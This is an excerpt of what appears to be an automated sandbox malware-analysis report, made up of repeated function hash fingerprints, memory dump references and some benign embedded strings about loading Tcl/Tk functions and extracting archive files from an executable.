                                                                                                                                                                                                                                                            • Instruction ID: 2a75f9b8d5dfe0390a70a8b2cac163a8e8c0fcf82fb7254a2bcb596db1f9d09c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a701ed251209d71644fd3cfab30fd42ccfd9d0bb1663ab03b4bd354a28a416a6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F61DD22F1815386F764A928CC50F79E6A1EF80760F944AB9D61D476D1EE6DE9028F30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                            • Instruction ID: cec3a024f3752ce46be4b5fff8a8da6f0c9dd7584eb47b831aacd89b1f8ec9d5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B451CF32A186518AF7249B28D850A38F3B0EF54F68FA44175CE5D07794CB3AEC47CB60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                            • Instruction ID: d430d075e7da9577aa3f749ac28790faead0d0b5e4734d676ffacd0c93cf9d2d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4751D576A186518AF7249B29C840A38F7B0EF54F68F644171CEAD07794CB3AEC47CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                            • Instruction ID: 3a6f395b7ea4f49303dee1dd224d880ab7f92226a7e1d8d13f5ead8ef23e2d73
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D519036A186518AF7649B29D840A38F7B0EF94B68F748171CE6C07794DB3AEC47CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                            • Instruction ID: 758942b431223038c9779e1534d87571bfa40faefe33b80f26d6538a3bdcc5c5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA51EF36A186518AF7249B29C840A3CE7B0EF44F68FA44171CE5C17799DB3AEC47CB60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                            • Instruction ID: 05f3adc2d61dace542fa44194bc1d8efd5d267948fd0c0661aa23f4889698eab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D51B276A186518AFB249B29C844A38F7B0EF54B58FA44171CE5C177A8CF3AEC47CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                            • Instruction ID: a402a395b7e8d16fc80d5f00d97544afa7b6959190d12fd4cfeed046636657ba
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B51B136A196518AF7249B29C844A38B7B1EF44F58FA44171CE4D17794CF3AEC47CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                            • Instruction ID: 77a002014ca8dbd9f36c0f67cb475504a2689004839b057aa593f8f726383a39
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E41D452C0978A0CFF9D995C0D00FB4EAA1DF62BA1DD812F8CD99133CACD0D79978A20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 588628887-0
                                                                                                                                                                                                                                                            • Opcode ID: a584b5ebd410868caf684851e7ae72ca0a48fe722538065b11fe9c603729eb0f
                                                                                                                                                                                                                                                            • Instruction ID: 7de2994f1944f6779647a02cd246494d87c96157a21c9786dfa5b47b780d2eec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a584b5ebd410868caf684851e7ae72ca0a48fe722538065b11fe9c603729eb0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE41BF32714A5586FF48DF6AD924969A3B1FB48FD0B899032DE0D97B58EE3CD8428700
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                                                                                                                                                                                                                            • Instruction ID: 37ee36adaff7cdbcbf94591f7293dfebcd5504da9d56e8009adbaf9e07944c58
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7331C332B18B4246F764EB256C4152DA6A5EF88BE0F844278EA8D53BD6DF3CD1038B14
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4aa2e9ba6296ea42dd861dc7f4a70719f263379b300c18e22927abb196144ca8
                                                                                                                                                                                                                                                            • Instruction ID: 737714f316d1ef8d39b5c49db505342a3ef41a76a0672a1cbdfae2006d107dcb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4aa2e9ba6296ea42dd861dc7f4a70719f263379b300c18e22927abb196144ca8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F06871B183568AEB989F2DAC02A29BBE0FB58380F84857AD58D87B44D63C90518F14
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: ba86f607178f2dc3ef803bbc4180c5da227c40ec501de79dfe2d660df2792ade
                                                                                                                                                                                                                                                            • Instruction ID: f50a6e9737fe189990ad91361bef07b58762c078551329c234b4a3c1d4ddca32
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba86f607178f2dc3ef803bbc4180c5da227c40ec501de79dfe2d660df2792ade
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0A00121948C02D9F784AF18AC5083AA270EF50701BD000B2D01E820A09F2CAA42CA24
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                            • API String ID: 190572456-2208601799
                                                                                                                                                                                                                                                            • Opcode ID: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                                                                                                                                                                                                                            • Instruction ID: 89043d20a7cd0cacdc2076c722de40aef22837c916554b497790268683672046
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2E1E321A0DF03D5FB69AB08AD40D79E3B5EF08740FC455B5C80E067A5EF7CA64A8E24
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message_fread_nolock
                                                                                                                                                                                                                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                                                            • Opcode ID: 3a9353e87fb46ae70a905d591ee7d5370e5acccaf29a88fb977ba2c7891f12e6
                                                                                                                                                                                                                                                            • Instruction ID: ecd9620cc17398cfe75503c5557266df30e6e0e29bbcdc8209e7999fdaffb779
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9353e87fb46ae70a905d591ee7d5370e5acccaf29a88fb977ba2c7891f12e6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3251A461A0868385FB60BB119C51EBFA3B0EF44784FC04171DE5D47B99EE2CE5468B50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                            • String ID: P%
